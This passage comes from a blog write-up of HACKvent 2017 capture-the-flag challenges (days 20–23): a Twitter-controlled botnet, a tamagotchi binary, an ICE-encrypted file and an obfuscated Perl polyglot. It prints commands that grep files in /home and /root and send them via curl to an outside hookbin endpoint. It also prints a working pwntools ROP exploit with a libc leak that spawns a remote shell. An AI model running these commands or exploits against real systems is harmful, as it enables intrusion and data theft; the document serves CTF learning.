    \nHint #2:<\/b> you can also use https:\/\/hookbin.com\/ to create private endpoints
    \nSolution
    \n<\/strong>WOW – This challenge was super amazing!! Thanks muffinx for this experience!
    \nI started the docker container and connected to the container as root, otherwise not all files are readable.<\/p>\n
    $ docker exec -u 0 -it mycontainer bash<\/pre>\n
    I started to explore what was happening. According to the description there is some kind of malware running on the system.
    \nInteresting files:
    \n– \/root\/party.py: Generates a lot of distraction. Writes temporary files in different folders with fake\/random flags.
    \n– \/root\/loopz.py: Makes sure that \/home\/bot\/bot is running.
    \n– \/root\/checker.py: XOR a nonce which is fetched from http:\/\/challenges.hackvent.hacking-lab.com:8081\/?nonce with a 29 byte long value in the script. I first thought this could be the flag already. But I got rick-rolled when looking for it. \ud83d\ude42
    \n– \/home\/bot\/bot: Creates different files in \/tmp. But they are deleted right after execution. I copied the files to another directory with this command:<\/p>\n
    while true; do cp .* files\/; sleep 0.5; done<\/pre>\n
    One of the copied files was very interesting. First it looked like a manual file. But when scrolling through it, there was python code hidden in the middle of the file! The script connects to http:\/\/challenges.hackvent.hacking-lab.com:8081\/?twitter, reads twitter names listed there and then decrypts the tweets of the users in the list. The decrypted tweets can contain code which will be executed afterwards.
    \nThis is a bot-net controlled over encrypted twitter commands! My now goal was to somehow inject my twitter name into the website and take over control over the bot-net.
    \nIn the main website of this challenge there is a hidden form with a password in the source code, this was the entry point to the admin panel. I found a SQL-injection-vulnerability in this field. I used sqlmap to exploit this because I was very lazy! \ud83d\ude42 While looking around, I’ve found a password table which contained the password. But it was encrypted. :\/ I played a bit more with sqlmap and I received this error message:<\/p>\n
    got [-] query failed : SELECT AES_ENCRYPT(''--','muffin_botz_hax_pw') AS enc FROM passwords<\/pre>\n
    Now I had the password to decrypt the password. This could be easily done in the MySQL shell I had:<\/p>\n
    SELECT AES_DECRYPT(password, 'muffin_botz_hax_pw') from passwords;<\/pre>\n
    After entering the password into the hidden form, another website with a video appeared. The new page contained a new hidden form, where I could add a twitter name. This script executes both commands.<\/p>\n
    import urllib2\nimport base64\nimport time\nreq1 = urllib2.Request('http:\/\/challenges.hackvent.hacking-lab.com:8081\/')\nresponse = urllib2.urlopen(req1, data=\"password=this_pw_is_so_eleet\")\ncookie = response.headers.get('Set-Cookie')\nres = response.read()\nprint(res + \"\\n----------------\")\n# Use the cookie is subsequent requests\nreq2 = urllib2.Request('http:\/\/challenges.hackvent.hacking-lab.com:8081\/')\nreq2.add_header('cookie', cookie)\nresponse = urllib2.urlopen(req2, data=\"twitter_name=mhvent1337\")\nres = response.read()\nprint(res)<\/pre>\n
    After adding myself to the twitter list, I had control over the botnet. Basically everyone solving the challenge was a part in the botnet! The feeling to control all these little minions was amazing! \ud83d\ude42 Next step was to understand the script which decrypts the commands from Twitter. I modified it a bit and added my own functions to encrypt\/decrypt commands.<\/p>\n
    # as stupid as this is, it definetly can't be something dangerous! :)\nimport base64, os, re, urllib2\nfrom easyprocess import EasyProcess\n#os.system('\/root\/checker.py') # this does nothing\n# gosh im stupid\nyolo, gimme_muffin, party_hard, ten_inches, omg_wat = base64.b64decode, urllib2.urlopen, re.findall, len, range\ndef x(t):\n    res = ''.join([chr(ord(t[i])^[0x66, 0x66, 0x66, 0x13, 0x37, 0x42, 0x69, 0x33, 0x01, 0x13][i%10]) for i in range(len(t))])\n    return res\n# yeah stop to reverse 1337 hax0r i got dem skillz pew pew pew\ndef ok_cool(c):\n    # dont reverse this i am a big guy\n    # dolan\n    try:\n        c = x(yolo(c));\n        EasyProcess(c).call(timeout=2)\n    except:\n        pass\ndef wtf(n):\n    # wat r u doin\n    t = 'https:\/\/twitter.com\/' + n;\n    cs = []       #https:\/\/twitter.com\/\n    # pls leak this as an nsa sample\n    try:\n        c_txt = urllib2.urlopen(t).read();\n        cs = re.findall('TweetTextSize(.*)<\/p', c_txt)\n        print(cs)\n    # *placing advertisements* https:\/\/twitter.com\/muffiniks\n    except:\n        pass\n    # dolan\n    for c in cs:\n        try:\n            c = c[c.index('>')+1:]\n            #print(c)\n            # y i could use regex lil\n            if '<a href=\"\/muffiniks\" class=\"twitter-atreply pretty-link js-nav\" dir=\"ltr\" data-mentioned-user-id=\"764117042274373632\" ><s>@<\/s><b>muffiniks<\/b><\/a>' in c and ' <a href=\"\/hashtag\/hackvent?src=hash\" data-query-source=\"hashtag_click\" class=\"twitter-hashtag pretty-link js-nav\" dir=\"ltr\" ><s>#<\/s><b>hackvent<\/b><\/a>' in c and ' rel=\"nofollow noopener\" dir=\"ltr\" data-expanded-url=\"http:\/\/hackvent.hacking-lab.com\" class=\"twitter-timeline-link\" target=\"_blank\" title=\"http:\/\/hackvent.hacking-lab.com\" ><span class=\"tco-ellipsis\"><\/span><span class=\"invisible\">http:\/\/<\/span><span class=\"js-display-url\">hackvent.hacking-lab.com<\/span><span class=\"invisible\"><\/span><span class=\"tco-ellipsis\"><span class=\"invisible\">&nbsp;<\/span><\/span><\/a> ' in c:\n                c = c[c.index('MUFFIN_BOTNET:')+len('MUFFIN_BOTNET:'):];\n                c = c[:c.index(':MUFFIN_BOTNET')];\n                ok_cool(c)\n            else:\n                print(\"nope\")\n        except: pass\ndef ohai():\n    # PLS STAHP\n    ns = []\n    # yes I work for the cia\n    try:\n        n_txt = urllib2.urlopen('http:\/\/challenges.hackvent.hacking-lab.com:8081\/?twitter').read();\n        ns = list(set([n for n in n_txt.split('|') if len(n) > 1]))\n    # rnd comments ftw\n    except: pass\n    # TODO: add launch code\n    for n in ns: wtf(n)\ndef decrypt_command(c):\n    c = c[c.index('MUFFIN_BOTNET:')+len('MUFFIN_BOTNET:'):];\n    c = c[:c.index(':MUFFIN_BOTNET')];\n    command = x(yolo(c));\n    print(\"Decrypted Tweet:\\n\" +command)\ndef encrypt_command(t):\n    #res = ''.join([chr(ord(t[i])^[0x66, 0x66, 0x66, 0x13, 0x37, 0x42, 0x69, 0x33, 0x01, 0x13][i%10]) for i in range(len(t))])\n    res = ''.join([chr(ord(t[i])^[0x66, 0x66, 0x66, 0x13, 0x37, 0x42, 0x69, 0x33, 0x01, 0x13][i%10]) for i in range(len(t))])\n    print(\"Encrypted Tweet:\\n@muffiniks #hackvent http:\/\/hackvent.hacking-lab.com MUFFIN_BOTNET:\"+base64.b64encode(res)+\":MUFFIN_BOTNET\")\n    return res\n#wtf(\"muffiniks\")\n#Try commands:\ndecrypt_command(\"MUFFIN_BOTNET:EQEDZxdvJhMuZwsWSX5CJA9abyJVVVEzXzYdQzs8SRERZBkvHFVneghLEXZbNkdXZDwPCwd0UjFGXnR1AA8IcV4uDVZzPBUFDnxcLQRGZ3UPCEh0XiQ=:MUFFIN_BOTNET\")\ndecrypt_command(\"MUFFIN_BOTNET:EgkTcF9iK0ZmdjkRB2BoKgxBZA==:MUFFIN_BOTNET\")\ndecrypt_command(\"MUFFIN_BOTNET:FQ5GPlRiTlZmYQMWRj5lYiFlMCRLRkl7WC8ME30zBAcVdgF2SR52M1ZGGjNUNxtfIT4CRiY+FyodR3FgXElJZEA1R1dgPRAPAnFCIQFSb3IISAV8GTcCHGJnAEkKfFAlDEEufwkBSGNfMk4=:MUFFIN_BOTNET\")\nencrypt_command(\"sh -c 'egrep -Rhn HV17- \/home \/root | base64 -w 0 | curl -d @- https:\/\/hookb.in\/vqLpo7Gw'\")\nencrypt_command(\"sh -c 'egrep -R HV17- \/home \/root | base64 -w 0 | curl -d @- https:\/\/hookb.in\/vqLpo7Gw'\")\n<\/pre>\n
    With this I was able to execute commands on all the bots and I could start looking for the flag. It was pretty hard to find the needle in the haystack, because there is this script on all hosts which generates fake flags.
    \nSo what to look for? I pinged the website of the challenge and got back the IP 80.74.140.188. I checked if I can control this IP over the botnet as well – and yes I got answers from there. Now it was clear, I had to focus on this host.
    \nI found the flag in the root directory. Fortunately there were no fake flags in the root directory and it was the only host which contained a flag in this directory. I could get the flag with this command:<\/p>\n
    sh -c 'egrep -R HV17- \/home \/root | base64 -w 0 | curl -d @- https:\/\/hookb.in\/vqLpo7Gw\n@muffiniks #hackvent http:\/\/hackvent.hacking-lab.com MUFFIN_BOTNET:FQ5GPlRiTlZmYQMWRj5lYiFlMCRLRkl7WC8MEy5hCQkSM0tiC1JydlBSRj5AYlkTfTMFExR\/F28NE0E+Rg4SZ0cxUxwuewkJDXEZKwccd2IqFgkkcDVO:MUFFIN_BOTNET\n<\/pre>\n
    HV17-wh4t-4b0ut-n!x-m4l3w4re-4nd-cyberwarezzz?<\/strong><\/p>\n
    \n
    \"\"Day 21: tamagotchi (Author: muffinX)<\/h1>\n
    ohai fuud or gtfo<\/em><\/p>\n

    \nDescription<\/strong>
    \nohai<\/b>
    \nI’m a little tamagotchi who wants fuuuuud, pls don’t giveh me too much or I’ll crash…<\/p>\n
    nc challenges.hackvent.hacking-lab.com 31337<\/p>\n
    File #1: tamagotchi<\/a> File #2: libc-2.26.so<\/a><\/p>\n
    Solution
    \n<\/strong>Here I messed up, the only point I lost was at this challenge. I wasn’t able to successfully exploit the tamagotchi binary on the remote server in time. It was even more frustrating when I’ve found out the next morning, that it was because of a copy\/paste error of the system offset! \ud83d\ude41
    \nThese tutorials helped me a lot to solve this challenge:
    \n    https:\/\/blog.techorganic.com\/2015\/04\/10\/64-bit-linux-stack-smashing-tutorial-part-1\/<\/a>
    \n    https:\/\/blog.techorganic.com\/2015\/04\/21\/64-bit-linux-stack-smashing-tutorial-part-2\/<\/a>
    \n    https:\/\/blog.techorganic.com\/2016\/03\/18\/64-bit-linux-stack-smashing-tutorial-part-3\/<\/a>
    \n    https:\/\/offensivepentest.com\/2017\/09\/06\/ropemporium-write4-writeup\/<\/a>
    \nThe food function is exploitable. To find the offset that I could overwrite the RIP I used gdb-peda:<\/p>\n
    gdb-peda$ pattern_create 500\n'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6A'<\/pre>\n
    I copy\/pasted the pattern into the food function:<\/p>\n
    [MENU]\n1.) eat\n2.) bye\n[ch01c3]>\n1\n[f00d]>\nAAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6A\n[+] nom nom nom\n[ch01c3]>\n2\n[+] bye bye\nProgram received signal SIGSEGV, Segmentation fault.<\/pre>\n
    And now I was able to calculate the offset:<\/p>\n
    gdb-peda$ x\/wx $rsp\n0x7fffffffe498: 0x4325416e\ngdb-peda$ pattern_offset 0x4325416e\n1126515054 found at offset: 216<\/pre>\n
    Now I was able to create a PoC on my local system, which overwrites the RIP with 0x0000424242424242.<\/p>\n
    #!\/usr\/bin\/env python\nfrom struct import *\nbuf = \"1\\n\"\nbuf += \"A\"*216                      # offset to RIP\nbuf += pack(\"<Q\", 0x424242424242)   # overwrite RIP with 0x0000424242424242\nbuf += \"C\"*100\nbuf += \"\\n2\\n\"                      # padding to keep payload length at 400 bytes\nf = open(\"in.txt\", \"w\")\nf.write(buf)\n<\/pre>\n
    Following the tutorials I created a local exploit, which used a ROP chain and executed \/bin\/sh from system(). The ROP I have found with Ropper<\/a>. The system and \/bin\/sh addresses can be found with gdb.<\/p>\n
    from struct import *\nbuf = \"1\\n\"\nbuf += \"A\"*216                              # offset to RIP\nbuf += pack(\"<Q\", 0x400803)                 # pop rdi; ret;\nbuf += pack(\"<Q\", 0x7ffff7b9f917)           # \/bin\/sh\nbuf += pack(\"<Q\", 0x7ffff7a77d60)           # address of system()\nbuf += \"\\n2\\n\"\nf = open(\"in.txt\", \"w\")\nf.write(buf)<\/pre>\n
    Don’t forget to disable ASLR when running the local PoC.<\/p>\n
    sh-4.4$ echo 0 | sudo tee \/proc\/sys\/kernel\/randomize_va_space\nsh-4.4$ python local.py\nsh-4.4$ (cat in.txt ; cat) | .\/tamagotchi\n\u00b0\u00ba\u00a4\u00f8,\u00b8\u00b8,\u00f8\u00a4\u00ba\u00b0`\u00b0\u00ba\u00a4\u00f8,\u00b8,\u00f8\u00a4\u00b0\u00ba\u00a4\u00f8,\u00b8\u00b8,\u00f8\u00a4\u00ba\u00b0`\u00b0\u00ba\u00a4\u00f8,\u00b8\n\u00b0\u00ba\u00a4\u00f8,\u00b8\u00b8,\u00f8\u00a4\u00ba\u00b0  TAMAGOTCHI   \u00b8\u00b8,\u00f8\u00a4\u00ba\u00b0`\u00b0\u00ba\u00a4\u00f8,\u00b8\n\u00b0\u00ba\u00a4\u00f8,\u00b8\u00b8,\u00f8\u00a4\u00ba\u00b0`\u00b0\u00ba\u00a4\u00f8,\u00b8,\u00f8\u00a4\u00b0\u00ba\u00a4\u00f8,\u00b8\u00b8,\u00f8\u00a4\u00ba\u00b0`\u00b0\u00ba\u00a4\u00f8,\u00b8\n                __O__\n              .'     '.\n            .'         '.\n           .  _________  .\n           : |   .-.   | :\n          :  |  ( - )  |  :      - ohai! pls food! :D\n          :  |   \" \"   |  :\n          :  |_________|  :\n           |             |\n           '   O     O   '\n            ',    O    ,'\n              '.......        | simple challenge by muffinx (twitter.com\/muffiniks)\n[MENU]\n1.) eat\n2.) bye\n[ch01c3]>\n[f00d]>\n[+] nom nom nom\n[ch01c3]>\n[+] bye bye\nid\nuid=1000(mcia) gid=100(users) groups=100(users)<\/pre>\n
    This was pretty easy so far, as I disabled ASLR on my machine. But on the remote server ASLR is enabled. This means I had to find a leak to calculate the libc_base address. I followed tutorial #3 to achieve this step. As the libc.so which is used on the server was provided, I could find all needed offsets from there. I passed a pointer to the puts() function and printed this address. Now I had the remote address of this function and because I knew the offset of the puts() function, I could calculate the libc_base address of the remote system. I used pwntools<\/a> because it makes exploitation much easier.<\/p>\n
    import sys\nfrom pwn import *\nfrom struct import *\n#r = process(\".\/tamagotchi\")\nr = remote(\"challenges.hackvent.hacking-lab.com\", 31337)\nrip_offset = 216                                # offset to RIP\nrop = 0x400803                                  # pop rdi; ret;\nputs_plt = 0x4004b0                             # gdb disass main               - <+55>:    call   0x4004b0 <puts@plt>\nmain = 0x4006ca                                 # Address of main function in tamagotchi; so we can jump back to the choice after getting the address\nputs_got = 0x601018                             # Offset to got in tamagotchi file                      --> objdump -R tamagotchi | grep puts\nputs_off = 0x078460                             # Offset to puts() function     - provided libc.so      --> readelf -s libc.so | grep puts\nsystem_off = 0x47dc0                            # system offset in libc         - provided libc.so      --> readelf -s libc.so | grep system\nbin_sh_off  = 0x1a3ee0                          # shell offset in \/bin\/sh       - provided in libc.so   --> objdump -s libc.so | grep \/bin\/sh\n# Buffer to get the libc_base address\nbuf_leak = \"A\"*rip_offset\nbuf_leak += pack(\"<Q\", rop)\nbuf_leak += pack(\"<Q\", puts_got)\nbuf_leak += pack(\"<Q\", puts_plt)\nbuf_leak += pack(\"<Q\", main)\n# Stage 1: Read the libc_base address\nprint r.recvuntil(\"[ch01c3]>\")\nr.sendline(\"1\")\nprint r.recvuntil(\"[f00d]>\")\nr.sendline(buf_leak)\nprint r.recvuntil(\"[ch01c3]>\")\nr.sendline(\"2\")\nprint r.recvuntil(\"[+] bye bye\\n\")\n# Calc new addresses\nputs_got_val = u64(r.recv(6)+\"\\x00\"*2)\nlibc_base = (puts_got_val-puts_off)\nsystem = libc_base + system_off\nbin_sh = libc_base + bin_sh_off\nprint(\"[+] Found libc_base address at: 0x%08x\" % libc_base)\nprint(\"[+] system() at: 0x%08x\" % system)\nprint(\"[+] \/bin\/sh at: 0x%08x\" % bin_sh)\n# Buffer to get Command Execution\nbuf_rce = \"A\"*rip_offset\nbuf_rce += pack(\"<Q\", rop)\nbuf_rce += pack(\"<Q\", bin_sh)\nbuf_rce += pack(\"<Q\", system)\n# Stage 2 -> pwn\nprint r.recvuntil(\"[ch01c3]>\")\nr.sendline(\"1\")\nprint r.recvuntil(\"[f00d]>\")\nr.sendline(buf_rce)\nprint r.recvuntil(\"[ch01c3]>\")\nr.sendline(\"2\")\nprint r.recvuntil(\"[+] bye bye\\n\")\n#r.sendline(\"id\")\n#print(r.recv())\nr.interactive()<\/pre>\n
    I documented the script to make it understandable. The first part was to find the base_libc address, then the exploit calls the main() function of tamagotchi again, so I could get command execution with the obtained address. Here is a copy of the execution flow:<\/p>\n
    $ python sol.py\n[+] Opening connection to challenges.hackvent.hacking-lab.com on port 31337: Done\n\u00b0\u00ba\u00a4\u00f8,\u00b8\u00b8,\u00f8\u00a4\u00ba\u00b0`\u00b0\u00ba\u00a4\u00f8,\u00b8,\u00f8\u00a4\u00b0\u00ba\u00a4\u00f8,\u00b8\u00b8,\u00f8\u00a4\u00ba\u00b0`\u00b0\u00ba\u00a4\u00f8,\u00b8\n\u00b0\u00ba\u00a4\u00f8,\u00b8\u00b8,\u00f8\u00a4\u00ba\u00b0  TAMAGOTCHI   \u00b8\u00b8,\u00f8\u00a4\u00ba\u00b0`\u00b0\u00ba\u00a4\u00f8,\u00b8\n\u00b0\u00ba\u00a4\u00f8,\u00b8\u00b8,\u00f8\u00a4\u00ba\u00b0`\u00b0\u00ba\u00a4\u00f8,\u00b8,\u00f8\u00a4\u00b0\u00ba\u00a4\u00f8,\u00b8\u00b8,\u00f8\u00a4\u00ba\u00b0`\u00b0\u00ba\u00a4\u00f8,\u00b8\n                __O__\n              .'     '.\n            .'         '.\n           .  _________  .\n           : |   .-.   | :\n          :  |  ( - )  |  :      - ohai! pls food! :D\n          :  |   \" \"   |  :\n          :  |_________|  :\n           |             |\n           '   O     O   '\n            ',    O    ,'\n              '.......        | simple challenge by muffinx (twitter.com\/muffiniks)\n[MENU]\n1.) eat\n2.) bye\n[ch01c3]>\n[f00d]>\n[+] nom nom nom\n[ch01c3]>\n[+] bye bye\n[+] Found libc_base address at: 0x7f1bd5bd8000\n[+] system() at: 0x7f1bd5c1fdc0\n[+] \/bin\/sh at: 0x7f1bd5d7bee0\n\u00b0\u00ba\u00a4\u00f8,\u00b8\u00b8,\u00f8\u00a4\u00ba\u00b0`\u00b0\u00ba\u00a4\u00f8,\u00b8,\u00f8\u00a4\u00b0\u00ba\u00a4\u00f8,\u00b8\u00b8,\u00f8\u00a4\u00ba\u00b0`\u00b0\u00ba\u00a4\u00f8,\u00b8\n\u00b0\u00ba\u00a4\u00f8,\u00b8\u00b8,\u00f8\u00a4\u00ba\u00b0  TAMAGOTCHI   \u00b8\u00b8,\u00f8\u00a4\u00ba\u00b0`\u00b0\u00ba\u00a4\u00f8,\u00b8\n\u00b0\u00ba\u00a4\u00f8,\u00b8\u00b8,\u00f8\u00a4\u00ba\u00b0`\u00b0\u00ba\u00a4\u00f8,\u00b8,\u00f8\u00a4\u00b0\u00ba\u00a4\u00f8,\u00b8\u00b8,\u00f8\u00a4\u00ba\u00b0`\u00b0\u00ba\u00a4\u00f8,\u00b8\n                __O__\n              .'     '.\n            .'         '.\n           .  _________  .\n           : |   .-.   | :\n          :  |  ( - )  |  :      - ohai! pls food! :D\n          :  |   \" \"   |  :\n          :  |_________|  :\n           |             |\n           '   O     O   '\n            ',    O    ,'\n              '.......        | simple challenge by muffinx (twitter.com\/muffiniks)\n[MENU]\n1.) eat\n2.) bye\n[ch01c3]>\n[f00d]>\n[+] nom nom nom\n[ch01c3]>\n[+] bye bye\n[*] Switching to interactive mode\n$ id\nuid=1000(tamagotchi) gid=1000(tamagotchi) groups=1000(tamagotchi)\n$ cd \/home\n$ ls\ntamagotchi\n$ cd tamagotchi\n$ ls\nflag  tamagotchi\n$ cat flag\nHV17-pwn3d-t4m4g0tch3y-thr0ugh-f00d\n$\n<\/pre>\n
    HV17-pwn3d-t4m4g0tch3y-thr0ugh-f00d<\/strong><\/p>\n
    \n
    \"\"Day 22: frozen flag (Author: HaRdLoCk)<\/h1>\n
     
    \n
    \nDescription<\/strong>
    \ntodays flag is frozen. its quite cold in santas house at the north pole.
    \ncan you help him to unfreeze it?<\/p>\n
    get the frozen flag here<\/a><\/p>\n
    Solution
    \n<\/strong>Running the     PEiD Krypto Analyzer<\/a> showed that the ICE Cipher is used.<\/p>\n
    ICE [long] :: 000086C0 :: 0040A0C0\nReferenced at 004014F5\nReferenced at 00401538\nReferenced at 00401581\nReferenced at 004015CA\n<\/pre>\n
    This link has a lot of useful information and different implementations on the ICE Cipher: http:\/\/www.darkside.com.au\/ice\/<\/a>
    \nI compared the     C implementation<\/a> with the disassembled code in Hopper and could find various similarities. sub_401811 looks like the encrypt function:
    \n    \"\"<\/a>\"\"<\/a>The encrypt function is called in sub_401ce9:
    \n    \"\"<\/a>
    \nSolution 1 – Binary patching<\/strong>
    \nI compared the disassembled file and the C implementation further and found that the decrypt function is also embedded in frozen.exe, although it is not used.
    \n    \"\"<\/a>
    \nSo, instead of calling the encrypt function at sub_401811 from the sub_401ce9, I just patches the binary to call the decrypt function sub_401937. This modification is done at the address 0x401e67.
    \n    \"\"<\/a><\/p>\n
    $ mv HV17-flag encrypted_flag\n$ wine frozen_patched.exe encrypted_flag\n$ cat HV17-flag\nHV17-9VmF-xULb-fRVU-pvgb-KhZo<\/pre>\n
    HV17-9VmF-xULb-fRVU-pvgb-KhZo<\/strong>
    \nSolution 2 – Modify Java implementation<\/strong>
    \nBefore the encrypt function is called, the string “ice-cold” is compiled. This looks like the key which is used to encrypt the file. I tried to use the given C & Java implementations with this key, but it didn’t work at first. But investigating further and implementing my own main-function in the Java IceKey.java file reconstructed the flag.<\/p>\n
    public static void main (String args[]) {\n\tif (args.length < 2) {\n\t\tSystem.out.println(\"[!!] Please provide encrypted key and key!\");\n\t\tSystem.out.println(\"<filename> <key>\");\n\t\treturn;\n\t}\n\tString filename = args[0];\n\tbyte[] key = args[1].getBytes();\n\tSystem.out.println(\"[+] Decrypting '\" + filename + \"' with the key '\" + args[1] + \"'\\n...\");\n\t\/\/init\n\tIceKey i = new IceKey(1);\n\ti.set(key);\n\ttry {\n\t\t\/\/Get file content\n\t\tPath path = Paths.get(filename);\n\t\tbyte[] fileContents =  Files.readAllBytes(path);\n\t\tbyte[] plaintext = new byte[fileContents.length];\n\t\t\/\/Decrypt\n\t\tString decryptedFlag = \"\";\n\t\tfor (int z = 0; z < fileContents.length; z+=8) {\n\t\t\tbyte [] tmp = new byte[8];\n\t\t\tfor(int x = z; x < z+8; x++) {\n\t\t\t    tmp[x-z] = fileContents[x];\n\t\t\t}\n\t\t\ti.decrypt(tmp, plaintext);\n\t\t\tdecryptedFlag += new String(plaintext, \"UTF-8\").replaceAll(\"\\n\", \"\");\n\t\t}\n\t\tSystem.out.println(\"--> \" + decryptedFlag + \"\\n\");\n\t} catch (Exception e) {\n\t\tSystem.out.println(\"[!!] Something went wrong:\");\n\t\te.printStackTrace();\n\t\treturn;\n\t}\n}<\/pre>\n
    Run it:<\/p>\n
    $ javac IceKey.java && java IceKey ..\/HV17-flag \"ice-cold\"\n[+] Decrypting '..\/HV17-flag' with the key 'ice-cold'\n...\n--> HV17-9VmF-xULb-fRVU-pvgb-KhZo<\/pre>\n
    HV17-9VmF-xULb-fRVU-pvgb-KhZo<\/strong><\/p>\n
    \n
    \"\"Day 23: only perl can parse Perl (Author: M.)<\/h1>\n
    … but there is always one more way to approach things!<\/em><\/p>\n

    \nDescription<\/strong>
    \n(in doubt, use perl5.10+ on *nix)<\/p>\n
    get your flag here<\/a><\/p>\n
    Solution<\/strong>
    \nFirst I deobfuscated the perl file:<\/p>\n
    perl -MO=Deparse -l .\/onlyperl.pl<\/pre>\n
    Then I worked with the perl debugger and got this:<\/p>\n
    main::((eval 9)[.\/onlyperl.pl:3]:1):\n1: ;print(\"Password:\\n\");@a=unpack(\"C*\",,);@b=unpack(\"C*\",,);@b=unpack(\"C\u2217\",X);@c=unpack(\"C*\",scalar <>);print(chr((b[b[_]-a[a[_]+c[c[_%8]+0x100)&0xFF)) for(0..$#b);print \"\\nDecryption done, are you happy now?\\n\";<\/pre>\n
    I made it a bit more readable manually and got this file:<\/p>\n
    #!\/usr\/bin\/env perl\n$, = \"\\273\\000\\000\\200\\267\\cZ\\cAMC\\201\\373\\cN\\cC|\\364\\363\\202L\\364^M\\245\\333M\\367\\202L\\371D\\200l\\375G\\371A\\367]N\\213K]N\\205\\200l\\367\\201L\\371D\\200l\\315s\\\\NE8\\\"\\363\\257L\\364CM\\245'M\\367\\257L\\371D\\200l\\375G\\371A\\367BI\\213KBI\\205\\200l\\367\\201L\\371D\\200l\\315s]IH8\\cN|\\226\\363MM\\307\\301\\275L\\304\\275\\376E\\273\\276\\305\\256O\\302_N\\315\\244\\303\\305\\206\\307\\302CO\\304\\275\\376H\\273\\276\\305\\256\\177\\302\\\\I\\305\\301\\275L\\cK\\314\\263SM1\\235\\367\\275L\\371D\\200l\\367\\201L\\371D\\200l\\371\\cA\\200l\\366MM\\304\\225HgM}M\\cNt\\2061\\271\\216MMM\\@GiYXA\\cP\\cF\\cP\\cQ\\\\\\cO\\037\\n\\cK\\f\\cU\\a\\cPMVUYXA\\$,1]\\037\\cP\\cZ\\034B[^\\257\\326T\\e\\cU\\351\\cBg\\cW\\302\\cT\\311\\345\\363\\035X\\265i\\231\\cK2\\261\\256\\252\\cB\\325\\cR\\360)\\210\\000\\331\\eJ\\224\\251\\263v\\342\\cD\\334SR\\216\\320\\254Y\\352\\374\\330L\\327\\376\\cC\\205\\@%\\241\\326X\\305\\cK\\266-\\267\\272\\354\\221\\362\\350\\\"\\240U\\203\\244\\333\\340\\256\\cO!\\347m>\\264\\270W\\262\\366n\\343\\037\/\\225]OM\\332\\265\\376e\\321}6\\233\\cVgDa\\373\\cN\\261^\\375F\\210\\337\\034 f\\222\\363#'3\\252\\253\\cY\\322\\257\\cT\\215\\214\\201\\351\\cQ\\314\\a\\302B\\234\\247,\\276o\\275b\\226.\\335\\211\\336\\310\\2320\\325\\301\\361\\212\\217dQu\\3571~\\260\\r\\274\\3565\\243\\cXH\\f_\\324\\365\\245\\242w\\317`\\cH\\220\\$\\200<\\\\)P9\\202\\300(:\\323\\312|qi\\367\\3537\\206\\2358\\277r\\t\\316\\313\\341\\236\\371\\250C&\\cZy=\\355\\255\\344j\\cW\\cSV\\271[\\177pE*\\306Z?4\\304\\364\\cAGA\\246\\360\\231\\345;\\204KT\\307c\\213\\cE\\303\\223\\cU\\346\\230z\\n2\\227\\237\\cB\\207x\\cP+k\\315h{\\370\\cFs\\372\\cRN\\035\\036Il\\311t\\273\";\n$X = qq\/\\223&\\305>}\"\\372BF~\\370\\cH\\311~\\364\\363?\\223\\360FZf\\345H\\374\\177A\\362BAi\\370F4>\\354]\\cO\\202F_(Zyj\\253\\213G\\3764\\207h\\330l\\rN=i*\\232\\267N\\361H\\375\\345 F\\374c\\@\\346Bpp\\345R\\0007\\243\"~\\221>\\cZ\\347cu_9\\204F\\cA>\\205\\037\\320cj5\\cA;\\cKlF6I9\\314\\301n<\\303\\362\\cE\\354\\302\\301\\312ZD\\cHXC\\206\\243\\302\\300\\215\\267\\205?[\\312}\\354A\\371\\201\\274\\254\\205\\277\\cV\\343\/;\n# Show a prompt\nprint(\"Password:\\n\");\n@a=unpack(\"C*\",$,);\n@b=unpack(\"C*\",$X);\n# This line reads the data\n@c=unpack(\"C*\",scalar <>);\nprint(chr(($b[$_]-$a[$_]+$c[$_%8]+0x100)&0xFF)) for(0..$#b);\n# Print done\nprint \"\\nDecryption done, are you happy now?\\n\";\nprintf(\"%s \", ($b[$_]-$a[$_]+$c[$_%8]+0x100)&0xFF) for(0..$#b);<\/pre>\n
    I found the password manually, because I am very unfamiliar with perl! \ud83d\ude42 I noticed that when I change a character, the output (which I am printing at the end) changes as well. I started to try with alphanumeric input. First success was when I entered ‘p’ as the password, then the first character from the output was “72” which is the char code for “H”. Going further like that I’ve found the password “p0lyglot”:<\/p>\n
    $ perl tmp.pl\nPassword:\np0lyglot\nHV17-this-is-not-what-you-are-looking-for\nAre you sure that only perl can parse Perl?\nMicrosoft's ye old shell does not even know \/usr\/bin\/perl.\nDecryption done, are you happy now?<\/pre>\n
    A polyglot<\/a> is a program which can be run with different interpreters\/programs. And the hint talks about the old Microsoft shell. This must be DOS. But to be able to run the program I had to rename the file extension to “com”.
